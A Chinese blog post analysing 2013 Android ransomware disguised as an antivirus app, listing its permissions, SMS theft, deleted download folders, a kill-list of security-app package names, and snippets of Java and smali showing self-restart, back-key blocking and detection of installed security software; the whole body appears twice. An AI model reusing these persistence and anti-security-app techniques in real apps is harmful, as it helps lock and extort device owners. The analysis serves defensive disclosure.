在Android平台上发现新的恶意程序伪装成杀毒软件挟持设备
2013-06-25 10:33
711 查看
Android平台恶意程序:不支付$100隐私就泄漏】6月25日消息,安全公司赛门铁克发布报告,在Android平台上发现新的恶意程序伪装成杀毒软件挟持设备,消费者支付$100才能让设备正常运作。这些恶意程序抓住消费者寻求安全心态,误导消费者删除虚假或不存在木马恶意程序,进而控制整台设备来威胁机主。
另外这个软件不是通过Google play发布的,因此大家要谨慎选择来源选型。。不要安装未知来源,或者从正规电子商城下载啊!
软件入口,智能终端安全的最本质!!
其实以前就有这样的样本,逼着用户非得捐赠的。。。。比如下面的代码:
public boolean onKeyDown(int keyCode, KeyEvent event) {
return true;
}
protected void onDestroy() {
super.onDestroy();
startService(new Intent(getApplicationContext(), RestartService.class));
}
public void onCreate() {
super.onCreate();
startActivity(new Intent(getApplicationContext(), MaliciousActivity.class)
.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
}
上述代码仅供说明,切勿模拟实战。。。。
下面是这个勒索软件的界面:
把自己打扮成圣斗士了,一下子提示这么多危险,然后索要保护费。。。
Package name: com.android.defender.androiddefender
安装完的桌面图标是:
申请的权限:尼玛真多啊
Access location information, such as Cell-ID or WiFi.
Access location information, such as GPS information.
Access information about networks.
Access information about the WiFi state.
Change network connectivity state.
Change Wi-Fi connectivity state.
Allows applications to disable the keyguard. 允许程序禁用键盘锁
(Expand or collapse the status bar.
Access to the list of accounts in the Accounts Service.
Open network connections.
Ends background processes. 结束进程
Read user's contacts data.
Check the phone's current state.
Read SMS messages on the device.
Start once the device has finished booting. 自启动
Open windows.
Make the phone vibrate.
Prevent processor from sleeping or screen from dimming.
Create new contact data.
Write to external storage devices.
Create new SMS messages.
Install a shortcut
还激活了设备管理。。。
删除这些目录的apk。。这是防止下载杀毒软件吗?
[EXTERNAL STORAGE MEDIA]/Download
/mnt/external_sd/Download
/mnt/extSdCard/Download
创建 SQLite 数据库: droidbackup.db ,窃取系统短信。
设备锁定时弹出这个界面。。。伪道士!!!
把其他的兄弟进程都干掉!
com.rechild.advancedtaskkiller
com.estrongs.android.pop
com.metago.astro
com.avast.android.mobilesecurity
com.estrongs.android.taskmanager
com.gau.go.launcherex.gowidget.taskmanagerex
com.gau.go.launcherex
com.rechild.advancedtaskkillerpro
mobi.infolife.taskmanager
com.rechild.advancedtaskkillerfroyo
com.netqin.aotkiller
com.arron.taskManagerFree
com.rhythm.hexise.task
然后。。。尼玛,楼主中剧毒了,全世界最流行的都中了!
开始要钱了!!!
还是打折价格。。
卸载很困难,阻止别的应用启动,这个以前的恶意软件就有。这是以前一个软件的代码!
.method public static b(Landroid/content/Context;)Ljava/lang/String;
.locals 4
const/4 v2, 0x0
//the encrypted regular expression to match the package name of security software
//(^com\.qihoo360\.mobilesafe$)|(^com\.tencent\.qqpimsecure$)|(^com\.lbe\.security$)
const-string v0, "ZkBw8CLr9ek1HtMhfN7YKvBg8CF18t3N7xzRFvRAZkBw8CLr9eiR8I0R8eir9eksrtRgrC3wu
KFRFvRAZkBw8CLr9IsWz3YOrC3wuKF1uoDDZl__"
//decrypt this string
invoke-static v0, Lcom/sec/android/providers/drm/However;->d(Ljava/lang/String;)Ljava/lang/String;
move-result-object v0
invoke-virtual p0, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
move-result-object v1
invoke-virtual v1, v2, Landroid/content/pm/PackageManager;->getInstalledPackages(I)Ljava/util/List;
move-result-object v1
:goto_0
invoke-interface v1, Ljava/util/List;->size()I
move-result v3
//traverse the list of installed packages.
if-ge v2, v3, :cond_1
invoke-interface v1, v2, Ljava/util/List;->get(I)Ljava/lang/Object;
move-result-object p0
check-cast p0, Landroid/content/pm/PackageInfo;
iget-object v3, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
invoke-static v3, v0, Lcom/sec/android/providers/drm/However;->a
(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
move-result-object v3
if-eqz v3, :cond_0
iget-object v0, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
:goto_1
//find the security software. return its package name.
return-object v0
:cond_0
//otherwise, check next package.
add-int/lit8 v2, v2, 0x1
goto :goto_0
:cond_1
const/4 v0, 0x0
goto :goto_1
.end method
甚至修改了系统设置,连factory data reset 都不可以。后两者等我的源代码分析。
另外这个软件不是通过Google play发布的,因此大家要谨慎选择来源选型。。不要安装未知来源,或者从正规电子商城下载啊!
软件入口,智能终端安全的最本质!!
其实以前就有这样的样本,逼着用户非得捐赠的。。。。比如下面的代码:
public boolean onKeyDown(int keyCode, KeyEvent event) {
return true;
}
protected void onDestroy() {
super.onDestroy();
startService(new Intent(getApplicationContext(), RestartService.class));
}
public void onCreate() {
super.onCreate();
startActivity(new Intent(getApplicationContext(), MaliciousActivity.class)
.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
}
上述代码仅供说明,切勿模拟实战。。。。
下面是这个勒索软件的界面:
把自己打扮成圣斗士了,一下子提示这么多危险,然后索要保护费。。。
Package name: com.android.defender.androiddefender
安装完的桌面图标是:
申请的权限:尼玛真多啊
Access location information, such as Cell-ID or WiFi.
Access location information, such as GPS information.
Access information about networks.
Access information about the WiFi state.
Change network connectivity state.
Change Wi-Fi connectivity state.
Allows applications to disable the keyguard. 允许程序禁用键盘锁
(Expand or collapse the status bar.
Access to the list of accounts in the Accounts Service.
Open network connections.
Ends background processes. 结束进程
Read user's contacts data.
Check the phone's current state.
Read SMS messages on the device.
Start once the device has finished booting. 自启动
Open windows.
Make the phone vibrate.
Prevent processor from sleeping or screen from dimming.
Create new contact data.
Write to external storage devices.
Create new SMS messages.
Install a shortcut
还激活了设备管理。。。
删除这些目录的apk。。这是防止下载杀毒软件吗?
[EXTERNAL STORAGE MEDIA]/Download
/mnt/external_sd/Download
/mnt/extSdCard/Download
创建 SQLite 数据库: droidbackup.db ,窃取系统短信。
设备锁定时弹出这个界面。。。伪道士!!!
把其他的兄弟进程都干掉!
com.rechild.advancedtaskkiller
com.estrongs.android.pop
com.metago.astro
com.avast.android.mobilesecurity
com.estrongs.android.taskmanager
com.gau.go.launcherex.gowidget.taskmanagerex
com.gau.go.launcherex
com.rechild.advancedtaskkillerpro
mobi.infolife.taskmanager
com.rechild.advancedtaskkillerfroyo
com.netqin.aotkiller
com.arron.taskManagerFree
com.rhythm.hexise.task
然后。。。尼玛,楼主中剧毒了,全世界最流行的都中了!
开始要钱了!!!
还是打折价格。。
卸载很困难,阻止别的应用启动,这个以前的恶意软件就有。这是以前一个软件的代码!
.method public static b(Landroid/content/Context;)Ljava/lang/String;
.locals 4
const/4 v2, 0x0
//the encrypted regular expression to match the package name of security software
//(^com\.qihoo360\.mobilesafe$)|(^com\.tencent\.qqpimsecure$)|(^com\.lbe\.security$)
const-string v0, "ZkBw8CLr9ek1HtMhfN7YKvBg8CF18t3N7xzRFvRAZkBw8CLr9eiR8I0R8eir9eksrtRgrC3wu
KFRFvRAZkBw8CLr9IsWz3YOrC3wuKF1uoDDZl__"
//decrypt this string
invoke-static v0, Lcom/sec/android/providers/drm/However;->d(Ljava/lang/String;)Ljava/lang/String;
move-result-object v0
invoke-virtual p0, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
move-result-object v1
invoke-virtual v1, v2, Landroid/content/pm/PackageManager;->getInstalledPackages(I)Ljava/util/List;
move-result-object v1
:goto_0
invoke-interface v1, Ljava/util/List;->size()I
move-result v3
//traverse the list of installed packages.
if-ge v2, v3, :cond_1
invoke-interface v1, v2, Ljava/util/List;->get(I)Ljava/lang/Object;
move-result-object p0
check-cast p0, Landroid/content/pm/PackageInfo;
iget-object v3, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
invoke-static v3, v0, Lcom/sec/android/providers/drm/However;->a
(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
move-result-object v3
if-eqz v3, :cond_0
iget-object v0, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
:goto_1
//find the security software. return its package name.
return-object v0
:cond_0
//otherwise, check next package.
add-int/lit8 v2, v2, 0x1
goto :goto_0
:cond_1
const/4 v0, 0x0
goto :goto_1
.end method
甚至修改了系统设置,连factory data reset 都不可以。后两者等我的源代码分析。
相关文章推荐
- POS机发现新恶意程序 能逃过55个杀毒软件
- 【一周时讯技评】超过50款Android程序暗藏恶意软件RedDrop|研究人员发现4G LTE协议的新缺陷
- Android平台各类恶意软件及病毒概览 推荐
- 移动设备恶意软件应用泛滥 Android成攻击首选
- 你的Android设备有恶意软件吗?
- Android平台各类恶意软件及病毒分析
- Android手机安全软件的恶意程序检测靠谱吗--LBE安全大师、腾讯手机管家、360手机卫士恶意软件检测方法研究
- Android平台快速滋生7种类型恶意软件
- Android发现恶意软件被植入木马
- Android平台上捕获Back键的事件,Back键是手机上的后退键,一般的软件不捕获相关信息可能导致你的程序被切换到后台,而回到桌面的尴尬情况,在Android上有两种方法来获取该按钮的事件
- Android设备上七种恶意软件类型和排行
- Android平台中各类恶意软件及病毒概览
- android 广告平台—杀毒软件是如何知道是否有广告的
- Android平台各类恶意软件及病毒概览
- [转]如何在移动设备程序中嵌入盈利广告,开始挣钱了 android iphone ipad 多平台支持
- Android平台各类恶意软件及病毒概览
- Android平台各类恶意软件及病毒概览
- 迈克菲详解Android.FakeInstaller恶意伪装程序
- Android学习路线(十九)支持不同设备——支持不同(Android)平台版本
- Android solve设备(手机)旋转过程中出现程序中断问题